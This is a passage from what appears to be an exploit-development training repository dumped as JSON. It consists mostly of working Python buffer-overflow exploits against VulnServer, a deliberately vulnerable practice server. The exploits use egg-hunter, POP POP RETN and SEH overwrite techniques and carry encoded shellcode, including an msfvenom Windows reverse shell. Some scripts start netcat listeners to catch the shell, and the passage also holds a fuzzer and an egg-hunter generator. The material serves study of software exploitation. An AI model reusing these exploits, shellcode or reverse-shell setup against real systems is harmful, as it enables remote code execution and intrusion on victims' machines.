\"\\x36\\x51\\x39\\x6f\\x6e\\x4c\\x47\\x4c\\x50\\x61\\x31\\x6c\"\nshellcode += \"\\x76\\x62\\x74\\x6c\\x61\\x30\\x4f\\x31\\x38\\x4f\\x76\\x6d\"\nshellcode += \"\\x46\\x61\\x69\\x57\\x59\\x72\\x39\\x62\\x30\\x52\\x30\\x57\"\nshellcode += \"\\x4c\\x4b\\x52\\x72\\x74\\x50\\x6e\\x6b\\x72\\x6a\\x65\\x6c\"\nshellcode += \"\\x4c\\x4b\\x32\\x6c\\x44\\x51\\x30\\x78\\x6d\\x33\\x52\\x68\"\nshellcode += \"\\x36\\x61\\x4a\\x71\\x52\\x71\\x4c\\x4b\\x56\\x39\\x45\\x70\"\nshellcode += \"\\x56\\x61\\x6a\\x73\\x6c\\x4b\\x53\\x79\\x57\\x68\\x79\\x73\"\nshellcode += 
\"\\x37\\x4a\\x62\\x69\\x4e\\x6b\\x75\\x64\\x4e\\x6b\\x43\\x31\"\nshellcode += \"\\x69\\x46\\x45\\x61\\x4b\\x4f\\x4c\\x6c\\x6a\\x61\\x48\\x4f\"\nshellcode += \"\\x54\\x4d\\x45\\x51\\x58\\x47\\x56\\x58\\x4d\\x30\\x44\\x35\"\nshellcode += \"\\x4b\\x46\\x46\\x63\\x43\\x4d\\x68\\x78\\x77\\x4b\\x43\\x4d\"\nshellcode += \"\\x34\\x64\\x61\\x65\\x38\\x64\\x56\\x38\\x4e\\x6b\\x53\\x68\"\nshellcode += \"\\x45\\x74\\x55\\x51\\x58\\x53\\x70\\x66\\x6c\\x4b\\x46\\x6c\"\nshellcode += \"\\x32\\x6b\\x4e\\x6b\\x46\\x38\\x77\\x6c\\x66\\x61\\x49\\x43\"\nshellcode += \"\\x4e\\x6b\\x43\\x34\\x4e\\x6b\\x55\\x51\\x7a\\x70\\x6d\\x59\"\nshellcode += \"\\x37\\x34\\x71\\x34\\x65\\x74\\x43\\x6b\\x33\\x6b\\x63\\x51\"\nshellcode += \"\\x71\\x49\\x50\\x5a\\x70\\x51\\x49\\x6f\\x69\\x70\\x73\\x6f\"\nshellcode += \"\\x43\\x6f\\x31\\x4a\\x6e\\x6b\\x42\\x32\\x5a\\x4b\\x4c\\x4d\"\nshellcode += \"\\x53\\x6d\\x61\\x78\\x77\\x43\\x70\\x32\\x73\\x30\\x57\\x70\"\nshellcode += \"\\x61\\x78\\x34\\x37\\x53\\x43\\x34\\x72\\x53\\x6f\\x31\\x44\"\nshellcode += \"\\x30\\x68\\x30\\x4c\\x42\\x57\\x77\\x56\\x63\\x37\\x79\\x6f\"\nshellcode += \"\\x69\\x45\\x6f\\x48\\x4a\\x30\\x35\\x51\\x53\\x30\\x73\\x30\"\nshellcode += \"\\x76\\x49\\x68\\x44\\x31\\x44\\x72\\x70\\x35\\x38\\x64\\x69\"\nshellcode += \"\\x6f\\x70\\x50\\x6b\\x65\\x50\\x4b\\x4f\\x58\\x55\\x30\\x50\"\nshellcode += \"\\x72\\x70\\x52\\x70\\x50\\x50\\x73\\x70\\x52\\x70\\x61\\x50\"\nshellcode += \"\\x32\\x70\\x51\\x78\\x79\\x7a\\x46\\x6f\\x69\\x4f\\x69\\x70\"\nshellcode += \"\\x79\\x6f\\x4a\\x75\\x6c\\x57\\x62\\x4a\\x43\\x35\\x61\\x78\"\nshellcode += \"\\x4f\\x30\\x69\\x38\\x72\\x70\\x6f\\x67\\x72\\x48\\x54\\x42\"\nshellcode += \"\\x55\\x50\\x65\\x55\\x75\\x69\\x4f\\x79\\x6a\\x46\\x33\\x5a\"\nshellcode += \"\\x56\\x70\\x33\\x66\\x62\\x77\\x50\\x68\\x7a\\x39\\x6d\\x75\"\nshellcode += \"\\x50\\x74\\x33\\x51\\x49\\x6f\\x48\\x55\\x6b\\x35\\x69\\x50\"\nshellcode += \"\\x51\\x64\\x46\\x6c\\x4b\\x4f\\x42\\x6e\\x47\\x78\\x52\\x55\"\nshellcode += 
\"\\x48\\x6c\\x63\\x58\\x48\\x70\\x4d\\x65\\x49\\x32\\x33\\x66\"\nshellcode += \"\\x79\\x6f\\x39\\x45\\x51\\x78\\x53\\x53\\x72\\x4d\\x63\\x54\"\nshellcode += \"\\x55\\x50\\x6d\\x59\\x38\\x63\\x71\\x47\\x53\\x67\\x36\\x37\"\nshellcode += \"\\x56\\x51\\x68\\x76\\x70\\x6a\\x65\\x42\\x56\\x39\\x50\\x56\"\nshellcode += \"\\x49\\x72\\x49\\x6d\\x33\\x56\\x49\\x57\\x33\\x74\\x77\\x54\"\nshellcode += \"\\x47\\x4c\\x37\\x71\\x75\\x51\\x6e\\x6d\\x53\\x74\\x67\\x54\"\nshellcode += \"\\x72\\x30\\x49\\x56\\x63\\x30\\x57\\x34\\x50\\x54\\x70\\x50\"\nshellcode += \"\\x36\\x36\\x61\\x46\\x51\\x46\\x52\\x66\\x51\\x46\\x62\\x6e\"\nshellcode += \"\\x61\\x46\\x51\\x46\\x50\\x53\\x70\\x56\\x75\\x38\\x70\\x79\"\nshellcode += \"\\x4a\\x6c\\x57\\x4f\\x4f\\x76\\x69\\x6f\\x6a\\x75\\x6b\\x39\"\nshellcode += \"\\x59\\x70\\x52\\x6e\\x62\\x76\\x30\\x46\\x59\\x6f\\x74\\x70\"\nshellcode += \"\\x61\\x78\\x47\\x78\\x4d\\x57\\x67\\x6d\\x65\\x30\\x79\\x6f\"\nshellcode += \"\\x6a\\x75\\x4f\\x4b\\x6a\\x50\\x6f\\x45\\x4d\\x72\\x42\\x76\"\nshellcode += \"\\x62\\x48\\x6d\\x76\\x6c\\x55\\x4d\\x6d\\x6f\\x6d\\x59\\x6f\"\nshellcode += \"\\x39\\x45\\x45\\x6c\\x67\\x76\\x61\\x6c\\x66\\x6a\\x6d\\x50\"\nshellcode += \"\\x39\\x6b\\x49\\x70\\x33\\x45\\x57\\x75\\x4d\\x6b\\x63\\x77\"\nshellcode += \"\\x45\\x43\\x72\\x52\\x42\\x4f\\x31\\x7a\\x63\\x30\\x52\\x73\"\nshellcode += \"\\x4b\\x4f\\x59\\x45\\x41\\x41\"\n\n# first payload\nEggy  = 'T00WT00W'\nEggy += shellcode\nEggy += '\\x41' * (1000-len(shellcode)-10)\nEggy += '\\r\\n'\n\n'''\nor dx,0x0fff      # loop thru memory pages\ninc edx by 1      # loop thru addresses for given page\npush edx          # save EDX in stack before syscall\npush byte +0x43   # push 0x43 (syscall id for NtDisplayString) onto the stack\npop eax           # store it in EAX\nint 0x2e          # make syscall\ncmp al,0x5        # compare lower portion of EAX with 5 to check for access violations\npop edx           # restore EDX after syscal was made\njz 0x0            # if true go back to first 
instruction and check the next memory page\nmov eax,w00t      # else move egg marker value to eax\nmov edi,edx       # move pointer to EDI\nscasd             # check for egg value match\njnz 0x5           # if true jump to increment EDX and check the next memory address in page\nscasd             # else increment EDI and check the value again (to make sure it's not egghunter code)\njnz 0x5           # if true jump to increment EDX and check the next memory address in page\njmp edi           # else egg marker found! execute shellcode positioned right after \n'''\nEggHunter = '\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\\x90'\n\n'''\nspike file\n----------\ns_string(\"GTER\");\ns_string(\" \");\ns_string_variable(\"FUZZ\");\ns_string(\"\\r\\n\");\nsleep(1);\n'''\n\n# second payload\nbuffer  = 'GTER /.:/'                                           # vulnerable command\n'''\n0:  5a                      pop    edx\n1:  4d                      dec    ebp\n2:  5f                      pop    edi\n'''\nbuffer += '\\x5a\\x4d\\x5f'                                        # stack alignment to compensate for changes made by GTER command\nbuffer += EggHunter                                             # hunt baby hunt\nbuffer += '\\x41' * (147-3-len(EggHunter))                       # filler to save pointer\nbuffer += '\\xb1\\x11\\x50\\x62'                                    # EIP [call eax] to get back to the start of our the buffer\nbuffer += '\\x43' * (5000-9-147-4-2)                             # filler\nbuffer += '\\r\\n'\n\ntry:\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect(('192.168.80.133', 9999))\n\tprint '[+] Sending %s bytes of eggy' %len(Eggy)\n\ts.send(Eggy)\n\ts.close\n\ttime.sleep(1)\nexcept Exception as e:\n\tprint e\n\ntry:\n        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect(('192.168.80.133', 
9999))\n        print '[+] Sending %s bytes of buffer' %len(buffer)\n        time.sleep(1)\n        s.send(buffer)\n\tsubprocess.call(['nc -nlvp 1337'], shell=True)\nexcept Exception as e:\n        print e\n\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/Egg Hunter/README.md",
    "content": "Saved pointer overrun found in the `GTER` command; an egg hunter was used to overcome the small buffer size.\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Egg%20Hunter/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py",
    "content": "#!/usr/share/python\n\nimport struct\nimport time\nimport socket\nfrom pwn import *\n\ndef BufferOverflow():\n\n\t# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html\n\tshellcode  = \"\"\n\tshellcode += \"\\x31\\xdb\\x64\\x8b\\x7b\\x30\\x8b\\x7f\"\n\tshellcode += \"\\x0c\\x8b\\x7f\\x1c\\x8b\\x47\\x08\\x8b\"\n\tshellcode += \"\\x77\\x20\\x8b\\x3f\\x80\\x7e\\x0c\\x33\"\n\tshellcode += \"\\x75\\xf2\\x89\\xc7\\x03\\x78\\x3c\\x8b\"\n\tshellcode += \"\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\"\n\tshellcode += \"\\xc7\\x89\\xdd\\x8b\\x34\\xaf\\x01\\xc6\"\n\tshellcode += \"\\x45\\x81\\x3e\\x43\\x72\\x65\\x61\\x75\"\n\tshellcode += \"\\xf2\\x81\\x7e\\x08\\x6f\\x63\\x65\\x73\"\n\tshellcode += \"\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\"\n\tshellcode += \"\\x8b\\x2c\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\"\n\tshellcode += \"\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x89\\xd9\"\n\tshellcode += \"\\xb1\\xff\\x53\\xe2\\xfd\\x68\\x63\\x61\"\n\tshellcode += \"\\x6c\\x63\\x89\\xe2\\x52\\x52\\x53\\x53\"\n\tshellcode += \"\\x53\\x53\\x53\\x53\\x52\\x53\\xff\\xd7\"\n\n\t#----------------------------#\n\t#           Payload          #\n\t#----------------------------#\n\t# buffer = CMD + AAA padding # |-------------------------------------------------------------+\n\t# buffer = EIP overwrite     # |---------| WinXP SP3 Pro [POP POP RETN]|[USER32.dll] |-------|-+\n\t# buffer = XXXXXXXX          # |------------| Simulate the need for [POP POP RETN] |---------|-|-+\n\t# buffer = JMP ESP           # |---------| WinXP SP3 Pro : [JMP ESP] | [essfunc.dll] |-------|-|-|-+\n\t# buffer = NOP sled          # |-------------------------------------------------------------|-|-|-|-+\n\t# buffer = shellcode         # |-------------------------------------------------------------|-|-|-|-|-+\n\t# buffer = BBB padding       # |-------------------------------------------------------------|-|-|-|-|-|-+\n        #----------------------------#                    
                                           | | | | | | |\n\t#                                                                                            | | | | | | |\n\tbuffer  = \"TRUN .\" + \"A\" * 2006                        # <-----------------------------------+ | | | | | |\n\tbuffer += struct.pack('<L', 0x7E41FE66)                # <-------------------------------------+ | | | | |\n\tbuffer += \"X\" * 8                                      # <---------------------------------------+ | | | |\n\tbuffer += struct.pack('<L', 0x625011af)                # <-----------------------------------------+ | | |\n\tbuffer += \"\\x90\" * 20                                  # <-------------------------------------------+ | |\n\tbuffer += shellcode                                    # <---------------------------------------------+ |\n\tbuffer += \"B\" * (3000-6-2006-4-8-4-20-len(shellcode))  # <-----------------------------------------------+\n\n\ttry:\n\t\tr = remote('192.168.80.133', 9999)\n\t\tr.recv(2048)\n\t\tprint \"[+] Sending %s bytes evil payload..\" %len(buffer)\n\t\tr.send(buffer)\n\texcept:\n\t\tprint \"Couldn't connect to target!\"\n\ndef main():\n\n\tprint (\n\t'''\n\t+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+\n\t|V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|\n\t+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+\n\t'''\n    )\n\tBufferOverflow()\n\nif __name__ == '__main__':\n\tmain()\n\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/SEH/Exploit.py",
    "content": "import socket\nimport sys\nimport os\nimport subprocess\n\n#root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\\x00' EXITFUNC=seh -f python -v shellcode\n#No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n#No Arch selected, selecting Arch: x86 from the payload\n#Found 10 compatible encoders\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\n#x86/shikata_ga_nai succeeded with size 351 (iteration=0)\n#x86/shikata_ga_nai chosen with final size 351\n#Payload size: 351 bytes\n#Final size of python file: 1900 bytes\nshellcode =  \"\"\nshellcode += \"\\xda\\xcc\\xbe\\xc1\\x1a\\x26\\xcc\\xd9\\x74\\x24\\xf4\\x5f\"\nshellcode += \"\\x29\\xc9\\xb1\\x52\\x31\\x77\\x17\\x83\\xef\\xfc\\x03\\xb6\"\nshellcode += \"\\x09\\xc4\\x39\\xc4\\xc6\\x8a\\xc2\\x34\\x17\\xeb\\x4b\\xd1\"\nshellcode += \"\\x26\\x2b\\x2f\\x92\\x19\\x9b\\x3b\\xf6\\x95\\x50\\x69\\xe2\"\nshellcode += \"\\x2e\\x14\\xa6\\x05\\x86\\x93\\x90\\x28\\x17\\x8f\\xe1\\x2b\"\nshellcode += \"\\x9b\\xd2\\x35\\x8b\\xa2\\x1c\\x48\\xca\\xe3\\x41\\xa1\\x9e\"\nshellcode += \"\\xbc\\x0e\\x14\\x0e\\xc8\\x5b\\xa5\\xa5\\x82\\x4a\\xad\\x5a\"\nshellcode += \"\\x52\\x6c\\x9c\\xcd\\xe8\\x37\\x3e\\xec\\x3d\\x4c\\x77\\xf6\"\nshellcode += \"\\x22\\x69\\xc1\\x8d\\x91\\x05\\xd0\\x47\\xe8\\xe6\\x7f\\xa6\"\nshellcode += \"\\xc4\\x14\\x81\\xef\\xe3\\xc6\\xf4\\x19\\x10\\x7a\\x0f\\xde\"\nshellcode += \"\\x6a\\xa0\\x9a\\xc4\\xcd\\x23\\x3c\\x20\\xef\\xe0\\xdb\\xa3\"\nshellcode += \"\\xe3\\x4d\\xaf\\xeb\\xe7\\x50\\x7c\\x80\\x1c\\xd8\\x83\\x46\"\nshellcode += \"\\x95\\x9a\\xa7\\x42\\xfd\\x79\\xc9\\xd3\\x5b\\x2f\\xf6\\x03\"\nshellcode += \"\\x04\\x90\\x52\\x48\\xa9\\xc5\\xee\\x13\\xa6\\x2a\\xc3\\xab\"\nshellcode += \"\\x36\\x25\\x54\\xd8\\x04\\xea\\xce\\x76\\x25\\x63\\xc9\\x81\"\nshellcode += \"\\x4a\\x5e\\xad\\x1d\\xb5\\x61\\xce\\x34\\x72\\x35\\x9e\\x2e\"\nshellcode += \"\\x53\\x36\\x75\\xae\\x5c\\xe3\\xda\\xfe\\xf2\\x5c\\x9b\\xae\"\nshellcode += 
\"\\xb2\\x0c\\x73\\xa4\\x3c\\x72\\x63\\xc7\\x96\\x1b\\x0e\\x32\"\nshellcode += \"\\x71\\xe4\\x67\\x6c\\x16\\x8c\\x75\\x8c\\x1d\\x74\\xf3\\x6a\"\nshellcode += \"\\x77\\x96\\x55\\x25\\xe0\\x0f\\xfc\\xbd\\x91\\xd0\\x2a\\xb8\"\nshellcode += \"\\x92\\x5b\\xd9\\x3d\\x5c\\xac\\x94\\x2d\\x09\\x5c\\xe3\\x0f\"\nshellcode += \"\\x9c\\x63\\xd9\\x27\\x42\\xf1\\x86\\xb7\\x0d\\xea\\x10\\xe0\"\nshellcode += \"\\x5a\\xdc\\x68\\x64\\x77\\x47\\xc3\\x9a\\x8a\\x11\\x2c\\x1e\"\nshellcode += \"\\x51\\xe2\\xb3\\x9f\\x14\\x5e\\x90\\x8f\\xe0\\x5f\\x9c\\xfb\"\nshellcode += \"\\xbc\\x09\\x4a\\x55\\x7b\\xe0\\x3c\\x0f\\xd5\\x5f\\x97\\xc7\"\nshellcode += \"\\xa0\\x93\\x28\\x91\\xac\\xf9\\xde\\x7d\\x1c\\x54\\xa7\\x82\"\nshellcode += \"\\x91\\x30\\x2f\\xfb\\xcf\\xa0\\xd0\\xd6\\x4b\\xde\\x21\\xea\"\nshellcode += \"\\x41\\x77\\x98\\x9f\\x2b\\x15\\x1b\\x4a\\x6f\\x20\\x98\\x7e\"\nshellcode += \"\\x10\\xd7\\x80\\x0b\\x15\\x93\\x06\\xe0\\x67\\x8c\\xe2\\x06\"\nshellcode += \"\\xdb\\xad\\x26\"\n\n'''\nspike file\n----------\ns_string(\"GMON\");\ns_string(\" \");\ns_string_variable(\"FUZZ\");\ns_string(\"\\r\\n\");\n'''\n\nbuffer  = 'GMON /.:/ '                  # junk\nbuffer += '\\x90' * 2495                 # nop sled\nbuffer += shellcode                     # reverse shell\nbuffer += '\\x90' * (999-len(shellcode)) # shellcode placeholder\nbuffer += '\\xeb\\x0a\\x90\\x90'            # nSEH hop over SEH handler\nbuffer += '\\x2b\\x17\\x50\\x62'            # SEH POP, POP, RETN in essfunc.dll\n\n'''\npiece of code that allow us to jump forward/backward, taken from Phrack #62 Article 7\nfldz\nfnstenv [esp-12]\npop ecx\nadd cl, 10\nnop\ndec ch  ; ecx=-256;\ndec ch  ; ecx=-256;\ndec ch  ; ecx=-256;\ndec ch  ; ecx=-256;\njmp ecx ; lets jmp ecx (current location - 1024)\n'''\n\nbuffer += '\\x90' * 7\nbuffer += '\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x59\\x80\\xC1\\x0A\\x90\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1'\nbuffer += '\\x41' * (5000-10-3494-4-4-2-21-7)\nbuffer += '\\r\\n'\n\ntry:\n\ts = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect(('192.168.80.133', 9999))\n\tprint '[+] Sending %s bytes of evil buffer..' %len(buffer)\n\ts.send(buffer)\n\tsubprocess.call(['nc -nlvp 1337'], shell=True)\nexcept Exception as e:\n\tprint e\n\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/SEH/README.md",
    "content": "Vanilla Structured Exception Handler overwrite found in the `GMON` command using the `Spike` fuzzer.\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/SEH/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/readme.md",
    "content": "### VulnServer\n\nVulnServer is a purposely vulnerable server built so that people like me can learn software exploitation. The subfolders contain all of the working exploits found for VulnServer.\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/PoC.JPG)\n"
  },
  {
    "path": "Tools/EggHunter.py",
    "content": "#!/usr/bin/python\n\nimport binascii\nimport time\nimport sys\n\n# colors (*NIX systems only)\nW = '\\033[0m'  # white\nR = '\\033[91m' # Light Red\nG = '\\033[32m' # green\nM = '\\033[95m' # Light magenta\n\n# the script takes user supplied egg as input and plug it to Skape's piece of art! the output (opcode) is debugger and binary file friendly.\n# Reference: \"Safely Searching Process Virtual Address Space\" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf\n# 0:  66 81 ca ff 0f          or     dx,0xfff\n# 5:  42                      inc    edx\n# 6:  52                      push   edx\n# 7:  6a 02                   push   0x2\n# 9:  58                      pop    eax\n# a:  cd 2e                   int    0x2e\n# c:  3c 05                   cmp    al,0x5\n# e:  5a                      pop    edx\n# f:  74 ef                   je     0x0\n# 11: b8 54 30 30 57          mov    eax,0x57303054           egg = \"T00W\"\n# 16: 8b fa                   mov    edi,edx\n# 18: af                      scas   eax,DWORD PTR es:[edi]\n# 19: 75 ea                   jne    0x5\n# 1b: af                      scas   eax,DWORD PTR es:[edi]\n# 1c: 75 e7                   jne    0x5\n# 1e: ff e7                   jmp    edi \n\nif len(sys.argv) < 2:\n\t\tprint \"Usage: python EggHunter.py <\"+G+\"egg\"+W+\">\"\n\t\tsys.exit(0)\n\nInput          = str(sys.argv[1])\nEgg            = binascii.hexlify(Input)\nEgg            = list(Egg)\nOpCode         = Egg[6]+Egg[7]+Egg[4]+Egg[5]+Egg[2]+Egg[3]+Egg[0]+Egg[1]\nShellcode      = \"\\\\x\"+Egg[6]+Egg[7]+\"\\\\x\"+Egg[4]+Egg[5]+\"\\\\x\"+Egg[2]+Egg[3]+\"\\\\x\"+Egg[0]+Egg[1]\nFinalOpcode    = \"6681caff0f42526a0258cd2e3c055a74efb8\" +M+ OpCode +W+ \"8bfaaf75eaaf75e7ffe7\"\nFinalShellcode = \"'\\\\x66\\\\x81\\\\xca\\\\xff\\\\x0f\\\\x42\\\\x52\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x2e\\\\x3c\\\\x05\\\\x5a\\\\x74\\\\xef\\\\xb8\" +M+ Shellcode +W+ 
\"\\\\x8b\\\\xfa\\\\xaf\\\\x75\\\\xea\\\\xaf\\\\x75\\\\xe7\\\\xff\\\\xe7'\"\n\nprint \"[\"+G+\"+\"+W+\"] Egg Hunter shellcode with egg of '\"+M+Input+W+\"'..\"\ntime.sleep(1)\nprint R+\"Final Opcode    \"+W+\": \" + FinalOpcode\nprint R+\"Final Shellcode \"+W+\": \" + FinalShellcode\n"
  },
  {
    "path": "Tools/FuzzMe.py",
    "content": "#!/usr/share/python\n\nimport socket\nfrom pwn import *\nimport time\n\ndef Fuzzer():\n\n\tbuffer = [\"A\"]\n\tcounter = 500\n\twhile len(buffer) <= 100:\n\t\tbuffer.append(\"A\" * counter)\n\t\tcounter = counter + 500\n\ttry:\n\t\t# Used SLMail as template here, adjust accordingly!\n\t\tr = remote('192.168.199.140', 110)\n\t\tr.recv(2048)\n\n\t\tfor string in buffer:\n\t\t\tprint \"Fuzzing with %s bytes of payload\" %len(string)\n\t\t\tr.send('USER username\\r\\n')\n\t\t\tr.recv(2048)\n\t\t\tr.send('PASS ' + string + '\\r\\n')\n\t\t\tr.recv(2048)\n\t\t\ttime.sleep(1)\n\texcept:\n\t\tprint \"Couldn't connect to target, or you hit the jackpot!\"\n\n\ndef main():\n\n\tprint (\n\t'''\n\t _______ _______ _______ _______ _______ _______\n\t|\\     /|\\     /|\\     /|\\     /|\\     /|\\     /|\n\t| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n\t| |   | | |   | | |   | | |   | | |   | | |   | |\n\t| |F  | | |u  | | |z  | | |z  | | |M  | | |e  | |\n\t| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n\t|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|\n\tby @ihack4falafel\n\t'''\n\t)\n\n\tFuzzer()\n\nif __name__ == '__main__':\n\tmain()"
  }
]